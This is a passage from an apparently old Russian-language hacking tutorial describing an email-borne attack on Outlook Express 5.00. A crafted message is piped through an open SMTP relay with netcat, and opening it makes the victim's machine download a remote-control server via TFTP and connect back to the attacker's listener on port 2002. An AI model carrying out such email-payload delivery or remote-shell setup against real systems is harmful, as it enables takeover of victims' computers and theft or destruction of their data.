Главная Случайная страница Контакты | Мы поможем в написании вашей работы! | ||
|
Как следует из сообщения программы netcat, она начинает работу в режиме клиента удаленного управления, прослушивающего запросы к порту 2002, поступающие с любого хоста.
Теперь все готово для атаки. Открываем еще один диалог сеана MS-DOS и с помощью приведенной ниже команды отправляем на компьютер Alex-1 через ретранслирующий SMTP-сервер sword-2000.sword.net подготовленное письмецо с начинкой:
type attack-tftp.txt | nc -vv sword-2000.sword.net 25
Если все пройдет хорошо и Коля выберет в клиенте Outlook Express 5.00 письмо (при этом на экране компьютера Alex-1 на мгновение отобразитс диалог сеанса MS-DOS), то в диалоге клиента TFTPD32 должны отобразиться сообщения о ходе процесса загрузки файла, как это представлено на Рис. 3.
Рис. 3. Программа сервера удаленного управления успешно загружена!
Одновременно в диалоге сеанса MS-DOS, в котором запущен клиент удаленного управления netcat, отобразится сообщение об установлении связи с атакованным компьютером Alex-1 (Рис. 4).
Рис. 4. Клиент удаленного управления подсоединился к компьютеру-жертве
Чтобы убедить вас, что это - правда, в диалоге на Рис. 4 содержится результат исполнения команды ipconfig, отображающей IP-адрес компьютера, к которому только что подсоединился наш хакер Петя. Теперь он может делатьс компьютером ламера Коли что угодно - форматировать диски, копировать информацию, удалять файлы - в общем, компьютер Alex-1 превращенв сетевого раба хакера Пети! И все это - только в результате отправки единственного письма!
Однако это еще не все - кроме описанной технологии вставки активного кода, в распоряжении хакеров имеются и другие методы атаки почтовых клиентов, к краткому обсуждению которых мы сейчас и приступим.
Дата публикования: 2014-11-03; Прочитано: 330 | Нарушение авторского права страницы | Мы поможем в написании вашей работы!